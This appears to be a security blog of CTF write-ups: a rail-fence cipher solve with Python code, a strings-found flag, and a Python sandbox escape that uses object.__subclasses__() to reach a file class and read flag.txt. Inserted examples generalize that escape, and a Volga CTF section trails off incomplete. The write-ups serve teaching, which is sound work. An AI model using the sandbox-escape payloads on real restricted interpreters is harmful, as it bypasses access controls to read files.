## Sunday, 19 April 2015

### InCTF 2015 Qualification Crypto Writeup - Crypto1

Before jumping into the challenges, get to know a little about InCTF: do read my previous blog post about it.

There were four cryptography challenges in total, but I am writing up only crypto-1, 2 and 4, as I was not the developer/designer of crypto-3.

### Crypto1: 100 Points

Challenge:

I found this sheet lying on the railway tracks and it seems to be encrypted in some form. Can you reveal the right intended text?

Text on sheet:

```
mgisd_fd_iuprhnedmfo5svqma_ureeer(eeeehl_sta_tYn__n_ustasyseoentenearlh)l_ar_ccxn-yclwsesnhodx_totib_i
```

Solution:

Looking at the ciphertext we can observe that it contains only printable ASCII characters, so either the plaintext characters have been jumbled in some pattern (a transposition) or each has been substituted with another character.

There was a hint in the question itself: 'sheet lying on the railway tracks'. So it might be the Rail Fence cipher, aka the ZigZag cipher.

Now the only challenge is to figure out the number of rails (the key) used in the cipher. That is easily brute-forced: trying every rail count from 2 to 10 gets the flag.

The key (number of rails) was: 9

Plain text after decoding would be:

```
md5(Yellow_ones_give_eastern_equipment_since_harsh_lunchboxes_understand_x-rated_measly_itchy_efforts)
```

So the flag would be: 58a1b42e43bff262735766c384033fe6

Python code for the Rail Fence cipher or Zig-Zag cipher (Python 3):

```python
def fence(lst, numrails):
    # Lay the items of lst out on numrails rails in a zig-zag, then read the
    # grid back rail by rail. Works for any sequence (a string or a list of indices).
    fence = [[None] * len(lst) for n in range(numrails)]
    # Rail visited at each step: 0,1,...,numrails-1,numrails-2,...,1 and repeat.
    rails = list(range(numrails - 1)) + list(range(numrails - 1, 0, -1))
    for n, x in enumerate(lst):
        fence[rails[n % len(rails)]][n] = x
    if 0:  # debug: show the zig-zag grid
        for rail in fence:
            print(''.join('.' if c is None else str(c) for c in rail))
    return [c for rail in fence for c in rail if c is not None]


def encode(text, n):
    return ''.join(fence(text, n))


def decode(text, n):
    # Encode the list of positions 0..len-1 to learn where each plaintext
    # position ends up in the ciphertext, then invert that permutation.
    rng = list(range(len(text)))
    pos = fence(rng, n)
    return ''.join(text[pos.index(i)] for i in rng)


# Brute forcing through the key length:
cipher = "mgisd_fd_iuprhnedmfo5svqma_ureeer(eeeehl_sta_tYn__n_ustasyseoentenearlh)l_ar_ccxn-yclwsesnhodx_totib_i"
for i in range(2, 11):
    print(i, decode(cipher, i))
```
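As an added worked example (not code from the original post), here is the whole solve in one place: a rail-fence decoder that fills the rails by counting the characters each rail holds rather than inverting an index permutation, a brute force over the rail count, and the final hash. In the solve above the right candidate was spotted by eye; here the `md5(...)` shape of the decoded text is used as an automatic check, which is this example's own heuristic, and the flag is assumed to be the MD5 of the text between the parentheses. `brute_force`, `flag_for` and `SHAPE` are names introduced here, not from the challenge.

```python
import hashlib
import re

# The ciphertext from the sheet and the sentence it decodes to (both from the
# challenge above).
CIPHER = ("mgisd_fd_iuprhnedmfo5svqma_ureeer(eeeehl_sta_tYn__n_ustasyseoentenearlh)"
          "l_ar_ccxn-yclwsesnhodx_totib_i")
PLAIN = ("md5(Yellow_ones_give_eastern_equipment_since_harsh_lunchboxes_understand_"
         "x-rated_measly_itchy_efforts)")


def rail_pattern(length, rails):
    """Rail index visited at each position 0..length-1 of a zig-zag with `rails` rails."""
    if rails < 2:
        return [0] * length
    period = 2 * (rails - 1)           # down rails-1 steps, then back up rails-1 steps
    return [i % period if i % period < rails else period - i % period
            for i in range(length)]


def rail_fence_encrypt(text, rails):
    """Write text in a zig-zag and read it off rail by rail."""
    pattern = rail_pattern(len(text), rails)
    return "".join(ch for rail in range(rails)
                   for ch, r in zip(text, pattern) if r == rail)


def rail_fence_decrypt(cipher, rails):
    """Invert rail_fence_encrypt: rail 0's characters come first in the
    ciphertext, so count how many each rail holds, slice those runs out, and
    hand them back in zig-zag order."""
    pattern = rail_pattern(len(cipher), rails)
    runs, start = [], 0
    for rail in range(rails):
        n = pattern.count(rail)
        runs.append(iter(cipher[start:start + n]))
        start += n
    return "".join(next(runs[r]) for r in pattern)


# A correct decode must look like md5(<sentence>): this check is the example's
# own heuristic for picking the right rail count without eyeballing candidates.
SHAPE = re.compile(r"^md5\([A-Za-z0-9_-]+\)$")


def brute_force(cipher, max_rails=10):
    """Try every rail count from 2 to max_rails; return (rails, plaintext) for
    the first candidate with the expected shape, or None."""
    for rails in range(2, max_rails + 1):
        candidate = rail_fence_decrypt(cipher, rails)
        if SHAPE.match(candidate):
            return rails, candidate
    return None


def flag_for(plaintext):
    """Assumed flag format: the MD5 hex digest of the text inside md5( ... )."""
    inner = plaintext[len("md5("):-1]
    return hashlib.md5(inner.encode()).hexdigest()


if __name__ == "__main__":
    rails, sentence = brute_force(CIPHER)
    print("rails:", rails)
    print("plain:", sentence)
    print("flag: ", flag_for(sentence))
```

Run as a script it prints the rail count, the recovered sentence and the hash. Counting run lengths per rail makes decryption linear in the text length, whereas inverting the permutation with `list.index` is quadratic; for a 102-character ciphertext it makes no difference, but the count-based form is the one to reach for when the input is large.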
Thanks for reading through the post.

## CSAW CTF 2014 Quals write-up

As team r00t we ended up scoring 1250. None of the team members worked for more than half a day, and our team is small, with just 3 members. All lazy people :D

### Exploitation - 1: bo

This was a simple problem, or else we didn't solve it the way it was meant to be solved.
As usual, as soon as we saw an executable we followed the usual procedure.

First, file type

```
> file bo
bo: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, not stripped
```
Second, look for strings:

```
> strings bo
```

Looking through the strings output... wait, is that the flag? Hell yeah :D

```
Welcome to CSAW CTF!
Time to break out IDA Demo and see what's going on inside me.  :]
flag{exploitation_is_easy!}
```

### Exploitation - 2: pybabbies

`nc 54.165.210.171 12345`

Connecting to the server on that port, we found a Python console showing up.
Afterwards we opened the source file.

As we played around with the console we found:
- It is Python 3.x.
- It does not show any returned value. Workaround: just print the return value.
- On any error the execution stops and the connection is closed.

Time to analyse the source code. All the cool modules and functions were banned :'(

We checked whether there was already a variable named flag or key or similar holding the flag. Obviously it wasn't that easy. So maybe there is a file like flag.txt or key.txt where the flag is, and we have to open it.

Playing around with tuples, we ended up with an interesting result:

```
>>> print(().__class__.__bases__[0].__subclasses__()[40])
<type 'file'>
```

Now it is obvious: try opening flag.txt, key.txt etc.

```
>>> print(().__class__.__bases__[0].__subclasses__()[40]("flag.txt"))
<open file 'flag', mode 'r' at 0x.....>
```

```
Welcome to my Python sandbox! Enter commands below!
>>> print(().__class__.__bases__[0].__subclasses__()[40]('flag.txt').read())
flag{definitely_not_intro_python}
```

`>>> exit`
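An added example (not the post's or the challenge's code) of the same escape written to be portable. The transcript hard-codes `[40]`, which is where `file` sits in `object.__subclasses__()` on that server's interpreter only; the position shifts with the Python version and with whatever modules are already loaded. This version walks the subclass tree of `object`, reached as `().__class__.__bases__[0]` exactly as in the transcript, and picks a class by `__name__`. `<type 'file'>` is how Python 2 prints the builtin `file` type; Python 3 has no such type, so the fallback is `_io.FileIO`, which is reachable the same way. The file it reads is a temporary file it creates itself, and `flag{constructed_example_flag}` is made up for the demo. `walk_subclasses`, `find_class`, `read_without_open` and `demo` are names introduced here.

```python
import os
import tempfile


def walk_subclasses(cls=None, seen=None):
    """Return every class reachable from object, depth first.

    object and type are reached as ().__class__.__bases__[0] and
    ().__class__.__class__, as the transcript does, so the reach-through
    needs no builtin name that a sandbox could have deleted.
    """
    if cls is None:
        cls = ().__class__.__bases__[0]      # object
    if seen is None:
        seen = []
    TYPE = ().__class__.__class__            # type
    found = []
    # TYPE.__subclasses__(cls) instead of cls.__subclasses__(): the short
    # form raises TypeError when cls is `type` itself.
    for sub in TYPE.__subclasses__(cls):
        if sub in seen:                      # diamonds (e.g. the io ABCs) would repeat
            continue
        seen.append(sub)
        found.append(sub)
        found.extend(walk_subclasses(sub, seen))
    return found


def find_class(name, module=None):
    """First class in the tree whose __name__ (and optionally __module__) match, else None."""
    for cls in walk_subclasses():
        if cls.__name__ == name and (module is None or cls.__module__ == module):
            return cls
    return None


def read_without_open(path):
    """Read `path` using only attribute access, never the name `open`."""
    file_cls = find_class("file", "__builtin__")   # Python 2: builtin file type
    if file_cls is not None:
        return file_cls(path).read()
    fileio = find_class("FileIO", "_io")           # Python 3: raw unbuffered file
    if fileio is None:
        raise RuntimeError("no usable file class reachable from object")
    fh = fileio(path)                              # mode defaults to 'r'
    try:
        return fh.read().decode()
    finally:
        fh.close()


def demo():
    """Constructed stand-in for the server's flag.txt (not the real flag)."""
    with tempfile.NamedTemporaryFile("w", delete=False, suffix=".txt") as tmp:
        tmp.write("flag{constructed_example_flag}")
        path = tmp.name
    try:
        return read_without_open(path)
    finally:
        os.unlink(path)


if __name__ == "__main__":
    print(demo())
```

Searching by name is also the habit to keep for real sandboxes: print `[c.__name__ for c in ().__class__.__bases__[0].__subclasses__()]` once, and only then decide which class (and which index, if you must) to use.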

Thanks for reading through the write-up. If anything is wrong or can be added to this post, please put it in the comments :)

## Saturday, 19 July 2014

### Volga CTF quals 2014

Team r00t managed only 700 points and secured 80th position.

This was one son of a difficult CTF.

### Web100

If login is successful, you are given a particular PHP session.
Login was easy: you enter a random name, it gets registered and access is given.

After logging in, in the page source we can see help.php

and refresh the logged-in page.